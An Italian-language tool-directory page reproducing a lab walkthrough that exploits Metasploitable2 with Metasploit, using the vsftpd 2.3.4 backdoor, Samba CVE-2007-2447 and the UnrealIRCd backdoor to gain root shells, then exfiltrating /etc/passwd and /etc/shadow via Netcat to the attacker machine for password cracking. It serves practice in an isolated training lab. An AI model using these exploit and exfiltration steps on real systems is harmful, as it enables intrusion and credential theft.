Skip to content
KitploitKITPLOIT
StrumentiExploitsBlog
Log in
Invia
StrumentiExploitsBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
Strumenti/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
Password CrackingRicognizioneFramework di ExploitMappatura della ReteAnalisi delle VulnerabilitàExploitEsfiltrazione DatiPenetration TestingCommand and ControlApprendimento e FormazioneSviluppo PayloadLab e Pratica
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

Guida completa allo sfruttamento con Metasploit contro Metasploitable2 — backdoor vsftpd, Samba CVE-2007-2447, backdoor UnrealIRCd, esfiltrazione tramite Netcat e preparazione al cracking delle credenziali.

Vedi Repository
223 mesi faNon ancora revisionato

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

Sfruttare Metasploitable2 con Metasploit: VSFTPD, Samba e altro

Una guida pratica allo sfruttamento utilizzando il Metasploit Framework — dalla configurazione del database PostgreSQL e la scansione db_nmap, attraverso tre shell root via vsftpd, Samba e UnrealIRCd, fino all'esfiltrazione delle credenziali con Netcat.


Panoramica

Questo repository documenta un impegno completo di Metasploit contro Metasploitable2 in un laboratorio VirtualBox isolato. Argomenti trattati:

  • Configurazione di Metasploit con un backend PostgreSQL e workspace
  • Esecuzione di db_nmap per salvare i risultati della scansione direttamente nel database
  • Sfruttamento del backdoor vsftpd 2.3.4 (compromissione della supply chain)
  • Sfruttamento di Samba CVE-2007-2447 (iniezione di comandi usermap_script)
  • Esfiltrazione di /etc/passwd e /etc/shadow tramite Netcat e unione con unshadow
  • Sfruttamento del backdoor UnrealIRCd 3.2.8.1

Ambiente di laboratorio

MacchinaRuoloIndirizzo IP
Kali Linux 2026.1Attaccante192.168.1.4
Metasploitable2Target192.168.1.3

Rete: 192.168.1.0/24 — rete NAT completamente isolata all'interno di VirtualBox.


Passo 1 — Configurazione di Metasploit e scansione con database

# Start PostgreSQL and initialize the database (one time only)
sudo systemctl start postgresql
sudo msfdb init

# Launch Metasploit
msfconsole

Kali e Metasploitable2 in esecuzione

Aggiornamento Kali e avvio PostgreSQL

msf6> db_status           # Verify: Connected to msf. Connection type: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # Confirm active workspace

Output di db_status e workspace

msf6> db_nmap -A 192.168.1.0/24 -n

Scansione db_nmap in corso

msf6> hosts
msf6> services

Output di hosts e services

Due server FTP trovati su Metasploitable2:

PortaServizioInformazioni
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

Passo 2 — Sfruttamento di vsftpd 2.3.4 (Backdoor)

Nel luglio 2011, l'archivio sorgente di vsftpd 2.3.4 è stato compromesso — è stato inserito un backdoor che apre una shell root sulla porta 6200 quando il nome utente FTP contiene :). CVE: CVE-2011-2523. Diff del codice: https://pastebin.com/AetT9sS5

msf6> search type:exploit name:vsftpd
# Result: exploit/unix/ftp/vsftpd_234_backdoor  (rank: excellent)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

Info exploit vsftpd - parte 1

Info exploit vsftpd - parte 2

vsftpd mostra opzioni

vsftpd imposta RHOSTS RPORT LHOST

msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

Esecuzione exploit vsftpd e sessione Meterpreter

ls sul filesystem root remoto

meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Output di whoami root e uname -a

Estrai password hashate:

cat /etc/shadow | grep '$1'

Password hashate del file shadow


Passo 3 — Sfruttamento di Samba CVE-2007-2447

Le versioni di Samba 3.0.0–3.0.25rc3 passano meta-caratteri della shell nel campo username direttamente a /bin/sh tramite l'opzione username map script — prima che avvenga l'autenticazione. Metasploitable2 esegue Samba 3.0.20-Debian.

msf6> search type:exploit name:samba
# ~7 exploits found

msf6> use exploit/multi/samba/usermap_script
msf6> info

Elenco exploit Samba dalla ricerca

Info Samba usermap_script

Descrizione CVE Samba e riferimenti

msf6> set RHOSTS 192.168.1.3
msf6> exploit

Esecuzione exploit Samba - sessione aperta

whoami root e smbd --version sulla shell Samba

whoami          # root
smbd --version  # Version 3.0.20-Debian

Esfiltrazione file con Netcat

Tab 2 — Kali (ricezione):

nc -l -p 4567 > passwd.txt

Tab 1 — Shell exploit (invio):

cat /etc/passwd | nc 192.168.1.4 4567

Listener Netcat su Kali in ricezione passwd

Contenuto di passwd.txt dopo l'esfiltrazione

Ripeti per /etc/shadow, poi unisci:

unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

Passo 4 — Sfruttamento di UnrealIRCd 3.2.8.1 (Backdoor)

UnrealIRCd 3.2.8.1 è stato distribuito con un backdoor nel suo codice sorgente. L'invio di AB alla porta 6667 fa sì che il server esegua qualsiasi comando successivo come root — nessuna autenticazione richiesta.

msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

Opzioni exploit UnrealIRCd ed esecuzione

Shell root UnrealIRCd - whoami e uname -a

whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

Opzioni richieste:

Scarica lo strumento